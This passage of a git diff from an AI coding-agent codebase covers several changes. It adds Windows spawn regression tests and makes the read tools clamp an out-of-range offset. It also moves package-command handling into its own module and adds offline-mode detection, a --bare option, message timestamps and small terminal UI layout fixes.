000000000..9247addf2 --- /dev/null +++ b/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts @@ -0,0 +1,101 @@ +/** + * bash-spawn-windows.test.ts — Regression test for Windows spawn EINVAL. + * + * Verifies that bash tool spawn options disable `detached: true` on Windows + * to prevent EINVAL errors in ConPTY / VSCode terminal contexts. + * + * Background: + * On Windows, `spawn()` with `detached: true` sets the + * CREATE_NEW_PROCESS_GROUP flag in CreateProcess. 
In certain terminal + * contexts (VSCode integrated terminal, ConPTY, Windows Terminal) this + * flag conflicts with the parent process group and causes a synchronous + * EINVAL from libuv. The bg-shell extension already guards against this + * with `detached: process.platform !== "win32"` (process-manager.ts); + * this test ensures all other spawn sites are aligned. + * + * See: gsd-build/gsd-2#XXXX + */ + +import test from "node:test"; +import assert from "node:assert/strict"; +import { spawn } from "node:child_process"; + +// Verify the spawn option pattern used across the codebase. +// This is a static/structural test — it reads the source files and asserts +// they use the platform-guarded detached flag. +import { readFileSync } from "node:fs"; +import { join, dirname } from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); + +const SPAWN_FILES = [ + join(__dirname, "bash.ts"), + join(__dirname, "..", "bash-executor.ts"), + join(__dirname, "..", "..", "utils", "shell.ts"), +]; + +test("spawn calls use platform-guarded detached flag (no unconditional detached: true)", () => { + for (const file of SPAWN_FILES) { + const content = readFileSync(file, "utf-8"); + const lines = content.split("\n"); + + for (let i = 0; i < lines.length; i++) { + const line = lines[i]!; + // Skip comments + if (line.trim().startsWith("//") || line.trim().startsWith("*")) continue; + // Check for unconditional `detached: true` + if (/detached:\s*true\b/.test(line)) { + assert.fail( + `${file}:${i + 1} has unconditional 'detached: true' — ` + + `must use 'detached: process.platform !== "win32"' ` + + `to prevent EINVAL on Windows (ConPTY / VSCode terminal)`, + ); + } + } + } +}); + +test("killProcessTree does not use detached: true for taskkill on Windows", () => { + const shellFile = join(__dirname, "..", "..", "utils", "shell.ts"); + const content = readFileSync(shellFile, "utf-8"); + + // Find the taskkill spawn call 
and ensure it doesn't have detached: true + const taskkillRegion = content.match(/spawn\("taskkill"[\s\S]*?\}\)/); + if (taskkillRegion) { + assert.ok( + !/detached:\s*true/.test(taskkillRegion[0]), + "taskkill spawn should not use detached: true — " + + "it can cause EINVAL on Windows and is unnecessary for a utility process", + ); + } +}); + +// Smoke test: spawn with platform-guarded detached flag actually works +test("spawn with detached: process.platform !== 'win32' succeeds", async () => { + const { promise, resolve, reject } = Promise.withResolvers(); + + const child = spawn( + process.platform === "win32" ? "cmd" : "sh", + process.platform === "win32" ? ["/c", "echo ok"] : ["-c", "echo ok"], + { + detached: process.platform !== "win32", + stdio: ["ignore", "pipe", "pipe"], + }, + ); + + let output = ""; + child.stdout?.on("data", (d: Buffer) => { output += d.toString(); }); + child.on("error", reject); + child.on("close", (code) => { + try { + assert.equal(code, 0, "spawn should succeed"); + assert.ok(output.trim().includes("ok"), `Expected 'ok' in output, got: ${output}`); + resolve(); + } catch (e) { + reject(e); + } + }); + + await promise; +}); diff --git a/packages/pi-coding-agent/src/core/tools/bash.ts b/packages/pi-coding-agent/src/core/tools/bash.ts index 4e1d65257..eccda574b 100644 --- a/packages/pi-coding-agent/src/core/tools/bash.ts +++ b/packages/pi-coding-agent/src/core/tools/bash.ts @@ -158,9 +158,13 @@ const defaultBashOperations: BashOperations = { return; } + // On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can + // cause EINVAL in VSCode/ConPTY terminal contexts. The bg-shell + // extension already guards this (process-manager.ts); align here. + // Process-tree cleanup uses taskkill /F /T on Windows regardless. const child = spawn(shell, [...args, command], { cwd, - detached: true, + detached: process.platform !== "win32", env: env ?? 
getShellEnv(), stdio: ["ignore", "pipe", "pipe"], }); diff --git a/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts b/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts index 532289f11..b7272559e 100644 --- a/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts +++ b/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts @@ -60,26 +60,26 @@ describe("edit-diff", () => { assert.match(result.diff, /CHANGED/); }); - it("computes diffs for preview without native helpers", async () => { + it("computes diffs for preview without native helpers", async (t) => { const dir = mkdtempSync(join(tmpdir(), "edit-diff-test-")); - try { - const file = join(dir, "sample.ts"); - writeFileSync(file, "const title = “Hello”;\n", "utf-8"); - - const result = await computeEditDiff( - file, - "const title = \"Hello\";\n", - "const title = \"Hi\";\n", - dir, - ); - - assert.ok(!("error" in result), "expected a diff result"); - if (!("error" in result)) { - assert.equal(result.firstChangedLine, 1); - assert.match(result.diff, /\+1 const title = "Hi";/); - } - } finally { + t.after(() => { rmSync(dir, { recursive: true, force: true }); + }); + + const file = join(dir, "sample.ts"); + writeFileSync(file, "const title = “Hello”;\n", "utf-8"); + + const result = await computeEditDiff( + file, + "const title = \"Hello\";\n", + "const title = \"Hi\";\n", + dir, + ); + + assert.ok(!("error" in result), "expected a diff result"); + if (!("error" in result)) { + assert.equal(result.firstChangedLine, 1); + assert.match(result.diff, /\+1 const title = "Hi";/); } }); }); diff --git a/packages/pi-coding-agent/src/core/tools/hashline-read.ts b/packages/pi-coding-agent/src/core/tools/hashline-read.ts index fc2da81eb..f7d944d14 100644 --- a/packages/pi-coding-agent/src/core/tools/hashline-read.ts +++ b/packages/pi-coding-agent/src/core/tools/hashline-read.ts @@ -123,12 +123,15 @@ export function createHashlineReadTool(cwd: string, options?: HashlineReadToolOp const allLines = 
textContent.split("\n"); const totalFileLines = allLines.length; - const startLine = offset ? Math.max(0, offset - 1) : 0; - const startLineDisplay = startLine + 1; + let startLine = offset ? Math.max(0, offset - 1) : 0; + // Clamp offset to file bounds instead of throwing (#3007) + let offsetClamped = false; if (startLine >= allLines.length) { - throw new Error(`Offset ${offset} is beyond end of file (${allLines.length} lines total)`); + startLine = Math.max(0, allLines.length - 1); + offsetClamped = true; } + const startLineDisplay = startLine + 1; let selectedContent: string; let userLimitedLines: number | undefined; @@ -172,6 +175,11 @@ export function createHashlineReadTool(cwd: string, options?: HashlineReadToolOp outputText = formatHashLines(truncation.content, startLineDisplay); } + // Prepend clamp notice so the agent knows offset was adjusted + if (offsetClamped) { + outputText = `[Offset ${offset} beyond end of file (${totalFileLines} lines). Clamped to line ${startLineDisplay}.]\n\n${outputText}`; + } + content = [{ type: "text", text: outputText }]; } diff --git a/packages/pi-coding-agent/src/core/tools/read.ts b/packages/pi-coding-agent/src/core/tools/read.ts index c2f23e60a..309e43b57 100644 --- a/packages/pi-coding-agent/src/core/tools/read.ts +++ b/packages/pi-coding-agent/src/core/tools/read.ts @@ -133,13 +133,18 @@ export function createReadTool(cwd: string, options?: ReadToolOptions): AgentToo const totalFileLines = allLines.length; // Apply offset if specified (1-indexed to 0-indexed) - const startLine = offset ? Math.max(0, offset - 1) : 0; - const startLineDisplay = startLine + 1; // For display (1-indexed) + let startLine = offset ? Math.max(0, offset - 1) : 0; - // Check if offset is out of bounds + // Clamp offset to file bounds instead of throwing (#3007). + // When an agent requests offset:30 on a 13-line file, return + // the last line with a notice rather than an error that + // propagates as invalid JSON downstream. 
+ let offsetClamped = false; if (startLine >= allLines.length) { - throw new Error(`Offset ${offset} is beyond end of file (${allLines.length} lines total)`); + startLine = Math.max(0, allLines.length - 1); + offsetClamped = true; } + const startLineDisplay = startLine + 1; // For display (1-indexed) // If limit is specified by user, use it; otherwise we'll let truncateHead decide let selectedContent: string; @@ -187,6 +192,11 @@ export function createReadTool(cwd: string, options?: ReadToolOptions): AgentToo outputText = truncation.content; } + // Prepend clamp notice so the agent knows offset was adjusted + if (offsetClamped) { + outputText = `[Offset ${offset} beyond end of file (${totalFileLines} lines). Clamped to line ${startLineDisplay}.]\n\n${outputText}`; + } + content = [{ type: "text", text: outputText }]; } diff --git a/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts b/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts new file mode 100644 index 000000000..a7929a1dd --- /dev/null +++ b/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts @@ -0,0 +1,92 @@ +/** + * spawn-shell-windows.test.ts — Regression test for Windows spawn ENOENT/EINVAL. + * + * On Windows, npm/npx/tsc and other tools are installed as .cmd batch scripts. + * Node's `spawn()` without `shell: true` cannot execute .cmd files, resulting + * in ENOENT or EINVAL errors. Every spawn site that may invoke a user-installed + * binary (not `node` or a shell like `sh`/`bash`/`cmd`) must include + * `shell: process.platform === "win32"` so the call is resolved through cmd.exe + * on Windows while remaining a direct exec on POSIX. + * + * This test structurally scans all spawn sites and verifies the guard is present. 
+ * + * Fixes: gsd-build/gsd-2#2854 + */ + +import test from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join, dirname, relative } from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const coreDir = join(__dirname, ".."); + +/** + * Files that call `spawn()` with a user-facing binary (not `node`, `sh`, `bash`, + * or `cmd`) and therefore need the Windows shell guard. + * + * If a file spawns only hardcoded system binaries (like `node` in rpc-client.ts), + * it does not need the guard and should NOT appear here. + */ +const SPAWN_FILES_NEEDING_SHELL_GUARD = [ + // Extension's GSD client — spawns the `gsd` binary which is a .cmd on Windows + join(coreDir, "..", "..", "..", "vscode-extension", "src", "gsd-client.ts"), + // exec.ts — used by extensions to run arbitrary commands + join(coreDir, "exec.ts"), + // LSP index — spawns project-type commands (tsc, cargo, etc.) + join(coreDir, "lsp", "index.ts"), + // LSP client — spawns LSP server binaries (npx, etc.) + join(coreDir, "lsp", "client.ts"), + // LSP mux — spawns lspmux binary + join(coreDir, "lsp", "lspmux.ts"), + // Package manager — spawns npm/yarn/pnpm + join(coreDir, "package-manager.ts"), +]; + +test("all spawn sites that invoke user-facing binaries include shell: process.platform === 'win32'", () => { + const failures: string[] = []; + + for (const file of SPAWN_FILES_NEEDING_SHELL_GUARD) { + let content: string; + try { + content = readFileSync(file, "utf-8"); + } catch { + // File may not exist in this checkout — skip + continue; + } + + const lines = content.split("\n"); + + // Find all spawn(..., { ... }) call sites and check each one + // for the presence of `shell: process.platform === "win32"` within + // 5 lines after the spawn call. 
+ for (let i = 0; i < lines.length; i++) { + const line = lines[i]!; + // Skip comments + if (line.trim().startsWith("//") || line.trim().startsWith("*")) continue; + + // Detect a spawn() call + if (/\bspawn\(/.test(line)) { + // Look ahead up to 8 lines for the shell guard + const lookahead = lines.slice(i, i + 8).join("\n"); + const hasShellGuard = + /shell:\s*process\.platform\s*===\s*["']win32["']/.test(lookahead); + + if (!hasShellGuard) { + const relPath = relative(join(coreDir, "..", ".."), file); + failures.push(`${relPath}:${i + 1}`); + } + } + } + } + + assert.deepEqual( + failures, + [], + `The following spawn sites are missing 'shell: process.platform === "win32"':\n` + + failures.map(f => ` - ${f}`).join("\n") + + `\nOn Windows, .cmd wrapper scripts (npm, npx, tsc, gsd) require shell ` + + `resolution. Without this guard, spawn fails with ENOENT or EINVAL.`, + ); +}); diff --git a/packages/pi-coding-agent/src/index.ts b/packages/pi-coding-agent/src/index.ts index 882f92e5b..86686caf0 100644 --- a/packages/pi-coding-agent/src/index.ts +++ b/packages/pi-coding-agent/src/index.ts @@ -68,6 +68,7 @@ export type { Extension, ExtensionActions, ExtensionAPI, + ExtensionManifest, ExtensionCommandContext, ExtensionCommandContextActions, ExtensionContext, @@ -94,6 +95,11 @@ export type { MessageRenderOptions, ProviderConfig, ProviderModelConfig, + LifecycleHookContext, + LifecycleHookHandler, + LifecycleHookMap, + LifecycleHookPhase, + LifecycleHookScope, ReadToolCallEvent, RegisteredCommand, RegisteredTool, @@ -114,12 +120,16 @@ export type { ToolCallEvent, ToolDefinition, ToolInfo, + SortResult, + SortWarning, ToolRenderResultOptions, ToolResultEvent, TurnEndEvent, TurnStartEvent, UserBashEvent, UserBashEventResult, + BashTransformEvent, + BashTransformEventResult, WidgetPlacement, WriteToolCallEvent, } from "./core/extensions/index.js"; @@ -130,6 +140,9 @@ export { importExtensionModule, isToolCallEventType, isToolResultEventType, + readManifest, + 
readManifestFromEntryPath, + sortExtensionPaths, wrapRegisteredTool, wrapRegisteredTools, wrapToolsWithExtensions, @@ -152,6 +165,8 @@ export type { ResolvedResource, } from "./core/package-manager.js"; export { DefaultPackageManager } from "./core/package-manager.js"; +export type { PackageCommand, PackageCommandOptions, PackageCommandRunnerOptions, PackageCommandRunnerResult } from "./core/package-commands.js"; +export { getPackageCommandUsage, parsePackageCommand, runPackageCommand } from "./core/package-commands.js"; export type { ResourceCollision, ResourceDiagnostic, ResourceLoader } from "./core/resource-loader.js"; export { DefaultResourceLoader } from "./core/resource-loader.js"; // SDK for programmatic usage @@ -210,8 +225,15 @@ export { SettingsManager, type TaskIsolationSettings, } from "./core/settings-manager.js"; +export { + SAFE_COMMAND_PREFIXES, + setAllowedCommandPrefixes, + getAllowedCommandPrefixes, +} from "./core/resolve-config-value.js"; // Skills export { + ECOSYSTEM_SKILLS_DIR, + ECOSYSTEM_PROJECT_SKILLS_DIR, formatSkillsForPrompt, getLoadedSkills, type LoadSkillsFromDirOptions, @@ -303,8 +325,11 @@ export { type RpcClientOptions, type RpcEventListener, type RpcCommand, + type RpcInitResult, + type RpcProtocolVersion, type RpcResponse, type RpcSessionState, + type RpcV2Event, } from "./modes/index.js"; // RPC JSONL utilities export { attachJsonlLineReader, serializeJsonLine } from "./modes/rpc/jsonl.js"; diff --git a/packages/pi-coding-agent/src/main.ts b/packages/pi-coding-agent/src/main.ts index 1f1c961e0..4416043cc 100644 --- a/packages/pi-coding-agent/src/main.ts +++ b/packages/pi-coding-agent/src/main.ts @@ -20,6 +20,7 @@ import type { LoadExtensionsResult } from "./core/extensions/index.js"; import { KeybindingsManager } from "./core/keybindings.js"; import { ModelRegistry } from "./core/model-registry.js"; import { resolveCliModel, resolveModelScope, type ScopedModel } from "./core/model-resolver.js"; +import { runPackageCommand } 
from "./core/package-commands.js"; import { DefaultPackageManager } from "./core/package-manager.js"; import { DefaultResourceLoader } from "./core/resource-loader.js"; import { type CreateAgentSessionOptions, createAgentSession } from "./core/sdk.js"; @@ -69,237 +70,6 @@ function isTruthyEnvFlag(value: string | undefined): boolean { return value === "1" || value.toLowerCase() === "true" || value.toLowerCase() === "yes"; } -type PackageCommand = "install" | "remove" | "update" | "list"; - -interface PackageCommandOptions { - command: PackageCommand; - source?: string; - local: boolean; - help: boolean; - invalidOption?: string; -} - -function getPackageCommandUsage(command: PackageCommand): string { - switch (command) { - case "install": - return `${APP_NAME} install [-l]`; - case "remove": - return `${APP_NAME} remove [-l]`; - case "update": - return `${APP_NAME} update [source]`; - case "list": - return `${APP_NAME} list`; - } -} - -function printPackageCommandHelp(command: PackageCommand): void { - switch (command) { - case "install": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("install")} - -Install a package and add it to settings. - -Options: - -l, --local Install project-locally (.pi/settings.json) - -Examples: - ${APP_NAME} install npm:@foo/bar - ${APP_NAME} install git:github.com/user/repo - ${APP_NAME} install git:git@github.com:user/repo - ${APP_NAME} install https://github.com/user/repo - ${APP_NAME} install ssh://git@github.com/user/repo - ${APP_NAME} install ./local/path -`); - return; - - case "remove": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("remove")} - -Remove a package and its source from settings. - -Options: - -l, --local Remove from project settings (.pi/settings.json) - -Example: - ${APP_NAME} remove npm:@foo/bar -`); - return; - - case "update": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("update")} - -Update installed packages. 
-If is provided, only that package is updated. -`); - return; - - case "list": - console.log(`${chalk.bold("Usage:")} - ${getPackageCommandUsage("list")} - -List installed packages from user and project settings. -`); - return; - } -} - -function parsePackageCommand(args: string[]): PackageCommandOptions | undefined { - const [command, ...rest] = args; - if (command !== "install" && command !== "remove" && command !== "update" && command !== "list") { - return undefined; - } - - let local = false; - let help = false; - let invalidOption: string | undefined; - let source: string | undefined; - - for (const arg of rest) { - if (arg === "-h" || arg === "--help") { - help = true; - continue; - } - - if (arg === "-l" || arg === "--local") { - if (command === "install" || command === "remove") { - local = true; - } else { - invalidOption = invalidOption ?? arg; - } - continue; - } - - if (arg.startsWith("-")) { - invalidOption = invalidOption ?? arg; - continue; - } - - if (!source) { - source = arg; - } - } - - return { command, source, local, help, invalidOption }; -} - -async function handlePackageCommand(args: string[]): Promise { - const options = parsePackageCommand(args); - if (!options) { - return false; - } - - if (options.help) { - printPackageCommandHelp(options.command); - return true; - } - - if (options.invalidOption) { - console.error(chalk.red(`Unknown option ${options.invalidOption} for "${options.command}".`)); - console.error(chalk.dim(`Use "${APP_NAME} --help" or "${getPackageCommandUsage(options.command)}".`)); - process.exitCode = 1; - return true; - } - - const source = options.source; - if ((options.command === "install" || options.command === "remove") && !source) { - console.error(chalk.red(`Missing ${options.command} source.`)); - console.error(chalk.dim(`Usage: ${getPackageCommandUsage(options.command)}`)); - process.exitCode = 1; - return true; - } - - const cwd = process.cwd(); - const agentDir = getAgentDir(); - const settingsManager = 
SettingsManager.create(cwd, agentDir); - reportSettingsErrors(settingsManager, "package command"); - const packageManager = new DefaultPackageManager({ cwd, agentDir, settingsManager }); - - packageManager.setProgressCallback((event) => { - if (event.type === "start") { - process.stdout.write(chalk.dim(`${event.message}\n`)); - } - }); - - try { - switch (options.command) { - case "install": - await packageManager.install(source!, { local: options.local }); - packageManager.addSourceToSettings(source!, { local: options.local }); - console.log(chalk.green(`Installed ${source}`)); - return true; - - case "remove": { - await packageManager.remove(source!, { local: options.local }); - const removed = packageManager.removeSourceFromSettings(source!, { local: options.local }); - if (!removed) { - console.error(chalk.red(`No matching package found for ${source}`)); - process.exitCode = 1; - return true; - } - console.log(chalk.green(`Removed ${source}`)); - return true; - } - - case "list": { - const globalSettings = settingsManager.getGlobalSettings(); - const projectSettings = settingsManager.getProjectSettings(); - const globalPackages = globalSettings.packages ?? []; - const projectPackages = projectSettings.packages ?? []; - - if (globalPackages.length === 0 && projectPackages.length === 0) { - console.log(chalk.dim("No packages installed.")); - return true; - } - - const formatPackage = (pkg: (typeof globalPackages)[number], scope: "user" | "project") => { - const source = typeof pkg === "string" ? pkg : pkg.source; - const filtered = typeof pkg === "object"; - const display = filtered ? 
`${source} (filtered)` : source; - console.log(` ${display}`); - const path = packageManager.getInstalledPath(source, scope); - if (path) { - console.log(chalk.dim(` ${path}`)); - } - }; - - if (globalPackages.length > 0) { - console.log(chalk.bold("User packages:")); - for (const pkg of globalPackages) { - formatPackage(pkg, "user"); - } - } - - if (projectPackages.length > 0) { - if (globalPackages.length > 0) console.log(); - console.log(chalk.bold("Project packages:")); - for (const pkg of projectPackages) { - formatPackage(pkg, "project"); - } - } - - return true; - } - - case "update": - await packageManager.update(source); - if (source) { - console.log(chalk.green(`Updated ${source}`)); - } else { - console.log(chalk.green("Updated packages")); - } - return true; - } - } catch (error: unknown) { - const message = error instanceof Error ? error.message : "Unknown package command error"; - console.error(chalk.red(`Error: ${message}`)); - process.exitCode = 1; - return true; - } -} - async function prepareInitialMessage( parsed: Args, autoResizeImages: boolean, @@ -590,7 +360,16 @@ export async function main(args: string[]) { process.env.PI_SKIP_VERSION_CHECK = "1"; } - if (await handlePackageCommand(args)) { + const packageCommand = await runPackageCommand({ + appName: APP_NAME, + args, + cwd: process.cwd(), + agentDir: getAgentDir(), + stdout: process.stdout, + stderr: process.stderr, + }); + if (packageCommand.handled) { + process.exitCode = packageCommand.exitCode; return; } @@ -612,6 +391,25 @@ export async function main(args: string[]) { const authStorage = AuthStorage.create(); const modelRegistry = new ModelRegistry(authStorage, getModelsPath()); + // Offline mode validation / auto-detection + if (offlineMode) { + // --offline flag: validate all models are local + if (!modelRegistry.isAllLocalChain()) { + const remoteModel = modelRegistry.getAll().find((m) => !ModelRegistry.isLocalModel(m)); + if (remoteModel) { + console.error( + `Error: --offline 
requires all configured models to be local. Found remote model: ${remoteModel.name} (${remoteModel.baseUrl || "cloud API"})`, + ); + process.exit(1); + } + } + } else if (modelRegistry.isAllLocalChain() && modelRegistry.getAll().length > 0) { + // Auto-detect: all models are local, enable offline mode + process.env.PI_OFFLINE = "1"; + process.env.PI_SKIP_VERSION_CHECK = "1"; + console.log("[gsd] All configured models are local \u2014 enabling offline mode automatically."); + } + const resourceLoader = new DefaultResourceLoader({ cwd, agentDir, @@ -621,11 +419,13 @@ export async function main(args: string[]) { additionalPromptTemplatePaths: firstPass.promptTemplates, additionalThemePaths: firstPass.themes, noExtensions: firstPass.noExtensions, - noSkills: firstPass.noSkills, - noPromptTemplates: firstPass.noPromptTemplates, - noThemes: firstPass.noThemes, + noSkills: firstPass.noSkills || firstPass.bare, + noPromptTemplates: firstPass.noPromptTemplates || firstPass.bare, + noThemes: firstPass.noThemes || firstPass.bare, systemPrompt: firstPass.systemPrompt, appendSystemPrompt: firstPass.appendSystemPrompt, + // --bare: suppress CLAUDE.md/AGENTS.md ancestor walk + ...(firstPass.bare ? 
{ agentsFilesOverride: () => ({ agentsFiles: [] }) } : {}), }); await resourceLoader.reload(); time("resourceLoader.reload"); diff --git a/packages/pi-coding-agent/src/modes/index.ts b/packages/pi-coding-agent/src/modes/index.ts index 205e9f54c..1e31e54e0 100644 --- a/packages/pi-coding-agent/src/modes/index.ts +++ b/packages/pi-coding-agent/src/modes/index.ts @@ -6,4 +6,11 @@ export { InteractiveMode, type InteractiveModeOptions } from "./interactive/inte export { type PrintModeOptions, runPrintMode } from "./print-mode.js"; export { type ModelInfo, RpcClient, type RpcClientOptions, type RpcEventListener } from "./rpc/rpc-client.js"; export { runRpcMode } from "./rpc/rpc-mode.js"; -export type { RpcCommand, RpcResponse, RpcSessionState } from "./rpc/rpc-types.js"; +export type { + RpcCommand, + RpcInitResult, + RpcProtocolVersion, + RpcResponse, + RpcSessionState, + RpcV2Event, +} from "./rpc/rpc-types.js"; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts new file mode 100644 index 000000000..6b918294d --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts @@ -0,0 +1,18 @@ +// GSD-2 — Provider display name mapping tests +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { providerDisplayName } from "../model-selector.js"; + +describe("providerDisplayName", () => { + test("renames 'anthropic' to 'anthropic-api'", () => { + assert.equal(providerDisplayName("anthropic"), "anthropic-api"); + }); + + test("passes through unmapped providers unchanged", () => { + assert.equal(providerDisplayName("claude-code"), "claude-code"); + assert.equal(providerDisplayName("openai"), "openai"); + assert.equal(providerDisplayName("bedrock"), "bedrock"); + assert.equal(providerDisplayName("github-copilot"), 
"github-copilot"); + assert.equal(providerDisplayName("openrouter"), "openrouter"); + }); +}); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts new file mode 100644 index 000000000..c5eb4ce74 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts @@ -0,0 +1,38 @@ +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { formatTimestamp } from "../timestamp.js"; + +describe("formatTimestamp", () => { + // Use a fixed local timestamp to avoid timezone issues + const d = new Date(2026, 2, 24, 10, 34, 0); // Mar 24, 2026 10:34:00 local time + const ts = d.getTime(); + + test("date-time-iso format (default)", () => { + assert.equal(formatTimestamp(ts, "date-time-iso"), "2026-03-24 10:34"); + assert.equal(formatTimestamp(ts), "2026-03-24 10:34"); // default + }); + + test("date-time-us format", () => { + assert.equal(formatTimestamp(ts, "date-time-us"), "03-24-2026 10:34 AM"); + }); + + test("US format handles PM correctly", () => { + const pm = new Date(2026, 2, 24, 14, 5, 0).getTime(); + assert.equal(formatTimestamp(pm, "date-time-us"), "03-24-2026 2:05 PM"); + }); + + test("US format handles noon as 12 PM", () => { + const noon = new Date(2026, 2, 24, 12, 0, 0).getTime(); + assert.equal(formatTimestamp(noon, "date-time-us"), "03-24-2026 12:00 PM"); + }); + + test("US format handles midnight as 12 AM", () => { + const midnight = new Date(2026, 2, 24, 0, 0, 0).getTime(); + assert.equal(formatTimestamp(midnight, "date-time-us"), "03-24-2026 12:00 AM"); + }); + + test("ISO format pads single digit months and days", () => { + const jan1 = new Date(2026, 0, 1, 9, 5, 0).getTime(); + assert.equal(formatTimestamp(jan1, "date-time-iso"), "2026-01-01 09:05"); + }); +}); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/armin.ts 
b/packages/pi-coding-agent/src/modes/interactive/components/armin.ts index afa0d780a..35a591c16 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/armin.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/armin.ts @@ -2,7 +2,7 @@ * Armin says hi! A fun easter egg with animated XBM art. */ -import type { Component, TUI } from "@gsd/pi-tui"; +import { type Component, type TUI, visibleWidth } from "@gsd/pi-tui"; import { theme } from "../theme/theme.js"; // XBM image: 31x36 pixels, LSB first, 1=background, 0=foreground @@ -88,20 +88,20 @@ export class ArminComponent implements Component { return this.cachedLines; } - const padding = 1; - const availableWidth = width - padding; + const center = (s: string) => { + const visible = visibleWidth(s); + const left = Math.max(0, Math.floor((width - visible) / 2)); + return " ".repeat(left) + s; + }; this.cachedLines = this.currentGrid.map((row) => { - // Clip row to available width before applying color - const clipped = row.slice(0, availableWidth).join(""); - const padRight = Math.max(0, width - padding - clipped.length); - return ` ${theme.fg("accent", clipped)}${" ".repeat(padRight)}`; + const clipped = row.slice(0, width).join(""); + return center(theme.fg("accent", clipped)); }); // Add "ARMIN SAYS HI" at the end const message = "ARMIN SAYS HI"; - const msgPadRight = Math.max(0, width - padding - message.length); - this.cachedLines.push(` ${theme.fg("accent", message)}${" ".repeat(msgPadRight)}`); + this.cachedLines.push(center(theme.fg("accent", message))); this.cachedWidth = width; this.cachedVersion = this.gridVersion; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts index fe78c54e9..c558b7cfc 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts +++ 
b/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts @@ -1,6 +1,7 @@ import type { AssistantMessage } from "@gsd/pi-ai"; import { Container, Markdown, type MarkdownTheme, Spacer, Text } from "@gsd/pi-tui"; import { getMarkdownTheme, theme } from "../theme/theme.js"; +import { formatTimestamp, type TimestampFormat } from "./timestamp.js"; /** * Component that renders a complete assistant message @@ -10,16 +11,19 @@ export class AssistantMessageComponent extends Container { private hideThinkingBlock: boolean; private markdownTheme: MarkdownTheme; private lastMessage?: AssistantMessage; + private timestampFormat: TimestampFormat; constructor( message?: AssistantMessage, hideThinkingBlock = false, markdownTheme: MarkdownTheme = getMarkdownTheme(), + timestampFormat: TimestampFormat = "date-time-iso", ) { super(); this.hideThinkingBlock = hideThinkingBlock; this.markdownTheme = markdownTheme; + this.timestampFormat = timestampFormat; // Container for text/thinking content this.contentContainer = new Container(); @@ -101,8 +105,6 @@ export class AssistantMessageComponent extends Container { : "Operation aborted"; if (hasVisibleContent) { this.contentContainer.addChild(new Spacer(1)); - } else { - this.contentContainer.addChild(new Spacer(1)); } this.contentContainer.addChild(new Text(theme.fg("error", abortMessage), 1, 0)); } else if (message.stopReason === "error") { @@ -111,5 +113,11 @@ export class AssistantMessageComponent extends Container { this.contentContainer.addChild(new Text(theme.fg("error", `Error: ${errorMsg}`), 1, 0)); } } + + // Show timestamp when the message is complete (has a stop reason) + if (message.stopReason && message.timestamp) { + const timeStr = formatTimestamp(message.timestamp, this.timestampFormat); + this.contentContainer.addChild(new Text(theme.fg("dim", timeStr), 1, 0)); + } } } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts 
b/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts index cec80e097..b35855e0f 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts @@ -29,6 +29,7 @@ export class BashExecutionComponent extends Container { private expanded = false; private contentContainer: Container; private ui: TUI; + private _borderColorKey: "dim" | "bashMode"; constructor(command: string, ui: TUI, excludeFromContext = false) { super(); @@ -37,6 +38,7 @@ export class BashExecutionComponent extends Container { // Use dim border for excluded-from-context commands (!! prefix) const colorKey = excludeFromContext ? "dim" : "bashMode"; + this._borderColorKey = colorKey; const borderColor = (str: string) => theme.fg(colorKey, str); // Add spacer @@ -137,7 +139,7 @@ export class BashExecutionComponent extends Container { this.contentContainer.clear(); // Command header - const header = new Text(theme.fg("bashMode", theme.bold(`$ ${this.command}`)), 1, 0); + const header = new Text(theme.fg(this._borderColorKey, theme.bold(`$ ${this.command}`)), 1, 0); this.contentContainer.addChild(header); // Output diff --git a/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts b/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts index d2610da96..9c4dae2d2 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts @@ -34,8 +34,8 @@ export class BorderedLoader extends Container { if (this.cancellable) { this.addChild(new Spacer(1)); this.addChild(new Text(keyHint("selectCancel", "cancel"), 1, 0)); + this.addChild(new Spacer(1)); } - this.addChild(new Spacer(1)); this.addChild(new DynamicBorder(borderColor)); } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts 
